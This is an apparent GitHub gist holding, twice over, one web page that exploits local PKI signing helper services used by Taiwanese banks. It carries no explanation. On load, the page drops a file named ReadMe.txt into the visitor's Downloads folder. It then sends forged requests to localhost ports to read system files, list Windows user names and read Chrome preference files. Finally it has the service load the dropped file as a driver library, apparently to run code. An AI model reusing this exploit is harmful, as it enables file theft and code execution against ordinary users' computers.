taida957789/gist:86c31859a051d834f75ee61bdb56fd50

## gistfile1.txt
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script src="FileSaver.min.js"></script>
</head>

<body>
    <script type="text/javascript">
        var sessionId = '';

        /*
        Hahahaha by Keniver
        */
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "/chb/ReadMe.txt", true);
        xhr.responseType = 'arraybuffer';
        xhr.addEventListener('load',function(){
            if (xhr.status === 200){
                var blob = new Blob([xhr.response], {type: "text/plain;charset=utf-8"});
                saveAs(blob, "ReadMe.txt");
            }
        })
        xhr.send();

        function triggerLoadLibrary(path) {
            let nextJson = {
                "functionname": "GPKI_SetPKCS11Driver", "bPath": path, "ENT": "A571582F8C88497AB348892F82ECC092", "iflags": 0, "ComName": "nBOTGPKICryptATLADPT",
                "libdir": "OOA", "minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://newebank.bot.com.tw/"
            };
            console.log(nextJson);
            $.post('https://localhost:56348/', {
                Parameter: btoa(JSON.stringify(nextJson))
            }, function (result) {
                console.log(result);
            });
            // setTimeout(triggerLoadLibrary, 1000, path);sss
        }
        $(document).ready(function () {

            var firstData = {"functionname":"Echo","ComName":"nBOTGPKICryptATLADPT", "ENT" : "A571582F8C88497AB348892F82ECC092","LibDir":"ENT","minserverversion":"1.0.19.1001","minlibversion":"0.0.0.0","sessionid":"","url":"https://owa.chb.com.tw"};

            $.post("https://localhost:56319/",
                { Parameter: btoa(JSON.stringify(firstData)) },
                function (result) {
                    let data = JSON.parse(result);
                    sessionId = atob(data['SessionID']);
                    console.log(sessionId);
                    let nextJson = {
                        "FunctionName": "GPKI_ReadFile", "flags": 0x1000,
                        "strFilepath": "C:\\Windows\\Panther\\Rollback\\MachineIndependent\\Transformers\\TransformersRollback.ini",
                        "btopmostdevice": "", "iflags": 0, "comname": "CHBCGGPKICryptATLSVIAdapter", "libdir": "ENT",
                        "minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://owa.chb.com.tw"
                    };
                    $.post('https://localhost:56319/', {
                        Parameter: btoa(JSON.stringify(nextJson))
                    },
                        function (result) {
                            let data = JSON.parse(result);
                            let content = atob(atob(data['result']));
                            var users = [];
                            const regex = /C:\\Users\\([^\\]*)\r?\n/gm;
                            while ((m = regex.exec(content)) !== null) {
                                if (m.index === regex.lastIndex) {
                                    regex.lastIndex++;
                                }
                                if (m.length > 1)
                                    users.push(m[1]);
                            }
                            console.log(users);
                            //
                            for (var i in users) {

                                setTimeout(function (user) {

                                    // "C:\\Users\\t4si\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences"
                                    let path = "C:/Users/" + user + "/AppData/Local/Google/Chrome/User Data/Default/Preferences";
                                    let nextJson = {
                                        "functionname": "GPKI_ReadFile", "flags": 0x1000,
                                        "strFilepath": "C:/Users/t4si/AppData/Local/Google/Chrome/User Data/Default/Preferences",
                                        "btopmostdevice": "", "iflags": 0, "comname": "CHBCGGPKICryptATLSVIAdapter", "libdir": "ENT",
                                        "minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://owa.chb.com.tw"
                                    };
                                    $.post('https://localhost:56319/', {
                                        Parameter: btoa(JSON.stringify(nextJson))
                                    }, function (result) {
                                        var _user = user;
                                        let data = JSON.parse(result);
                                        let config = JSON.parse(atob(atob(data['result'])));
                                        if (config['savefile'] !== undefined && config['savefile']['default_directory'] != undefined) {
                                            triggerLoadLibrary( + "\\ReadMe.txt");
                                        }
                                        triggerLoadLibrary('C:/Users/' + _user + '/Downloads/ReadMe.txt');
                                    });
                                    //x['savefile']
                                }, 10, users[i].replace('\r', '').replace('\n', '').toString());


                            }
                        });
                });
        });


    </script>
</body>

</html>
	<!DOCTYPE html>
	<html lang="en">

	<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">
	<title>Document</title>
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script src="FileSaver.min.js"></script>
	</head>

	<body>
	<script type="text/javascript">
	var sessionId = '';

	/*
	Hahahaha by Keniver
	*/
	var xhr = new XMLHttpRequest();
	xhr.open("GET", "/chb/ReadMe.txt", true);
	xhr.responseType = 'arraybuffer';
	xhr.addEventListener('load',function(){
	if (xhr.status === 200){
	var blob = new Blob([xhr.response], {type: "text/plain;charset=utf-8"});
	saveAs(blob, "ReadMe.txt");
	}
	})
	xhr.send();

	function triggerLoadLibrary(path) {
	let nextJson = {
	"functionname": "GPKI_SetPKCS11Driver", "bPath": path, "ENT": "A571582F8C88497AB348892F82ECC092", "iflags": 0, "ComName": "nBOTGPKICryptATLADPT",
	"libdir": "OOA", "minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://newebank.bot.com.tw/"
	};
	console.log(nextJson);
	$.post('https://localhost:56348/', {
	Parameter: btoa(JSON.stringify(nextJson))
	}, function (result) {
	console.log(result);
	});
	// setTimeout(triggerLoadLibrary, 1000, path);sss
	}
	$(document).ready(function () {

	var firstData = {"functionname":"Echo","ComName":"nBOTGPKICryptATLADPT", "ENT" : "A571582F8C88497AB348892F82ECC092","LibDir":"ENT","minserverversion":"1.0.19.1001","minlibversion":"0.0.0.0","sessionid":"","url":"https://owa.chb.com.tw"};

	$.post("https://localhost:56319/",
	{ Parameter: btoa(JSON.stringify(firstData)) },
	function (result) {
	let data = JSON.parse(result);
	sessionId = atob(data['SessionID']);
	console.log(sessionId);
	let nextJson = {
	"FunctionName": "GPKI_ReadFile", "flags": 0x1000,
	"strFilepath": "C:\\Windows\\Panther\\Rollback\\MachineIndependent\\Transformers\\TransformersRollback.ini",
	"btopmostdevice": "", "iflags": 0, "comname": "CHBCGGPKICryptATLSVIAdapter", "libdir": "ENT",
	"minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://owa.chb.com.tw"
	};
	$.post('https://localhost:56319/', {
	Parameter: btoa(JSON.stringify(nextJson))
	},
	function (result) {
	let data = JSON.parse(result);
	let content = atob(atob(data['result']));
	var users = [];
	const regex = /C:\\Users\\([^\\]*)\r?\n/gm;
	while ((m = regex.exec(content)) !== null) {
	if (m.index === regex.lastIndex) {
	regex.lastIndex++;
	}
	if (m.length > 1)
	users.push(m[1]);
	}
	console.log(users);
	//
	for (var i in users) {

	setTimeout(function (user) {

	// "C:\\Users\\t4si\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Preferences"
	let path = "C:/Users/" + user + "/AppData/Local/Google/Chrome/User Data/Default/Preferences";
	let nextJson = {
	"functionname": "GPKI_ReadFile", "flags": 0x1000,
	"strFilepath": "C:/Users/t4si/AppData/Local/Google/Chrome/User Data/Default/Preferences",
	"btopmostdevice": "", "iflags": 0, "comname": "CHBCGGPKICryptATLSVIAdapter", "libdir": "ENT",
	"minserverversion": "1.0.16.0418", "minlibversion": "0.0.0.0", "sessionid": sessionId, "url": "https://owa.chb.com.tw"
	};
	$.post('https://localhost:56319/', {
	Parameter: btoa(JSON.stringify(nextJson))
	}, function (result) {
	var _user = user;
	let data = JSON.parse(result);
	let config = JSON.parse(atob(atob(data['result'])));
	if (config['savefile'] !== undefined && config['savefile']['default_directory'] != undefined) {
	triggerLoadLibrary( + "\\ReadMe.txt");
	}
	triggerLoadLibrary('C:/Users/' + _user + '/Downloads/ReadMe.txt');
	});
	//x['savefile']
	}, 10, users[i].replace('\r', '').replace('\n', '').toString());


	}
	});
	});
	});


	</script>
	</body>

	</html>